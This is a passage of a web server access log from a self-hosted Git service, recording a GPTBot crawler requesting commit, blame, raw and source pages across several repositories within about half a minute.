-[17/Feb/2026:15:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12747] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:15:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21832] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24008] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:15:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate" [Client 74.7.227.38] [Length 26068] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:15:08:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:15:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode" -[17/Feb/2026:15:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_error.log" [Client 74.7.227.38] [Length 21151] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_error.log" [Client 74.7.227.38] [Length 19367] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets" [Client 74.7.227.38] [Length 28013] [Gzip 5.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" -[17/Feb/2026:15:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2f.gitignore" [Client 74.7.227.38] [Length 23303] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:15:08:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8478] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fservices%2fgeminiService.ts" [Client 74.7.227.38] [Length 25002] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:15:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15806] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14314] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20904] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18120] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" -[17/Feb/2026:15:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" -[17/Feb/2026:15:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" -[17/Feb/2026:15:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" -[17/Feb/2026:15:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 30198] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:15:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 22972] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:15:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.patch" [Client 74.7.227.38] [Length 1639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:15:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.patch" [Client 74.7.227.38] [Length 32801] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:15:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.diff" [Client 74.7.227.38] [Length 32145] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" -[17/Feb/2026:15:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" -[17/Feb/2026:15:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11908] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" -[17/Feb/2026:15:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11213] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11189] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11211] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211027] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211030] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 296388] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211046] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211029] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile?display=source" [Client 74.7.227.38] [Length 11590] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" -[17/Feb/2026:15:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 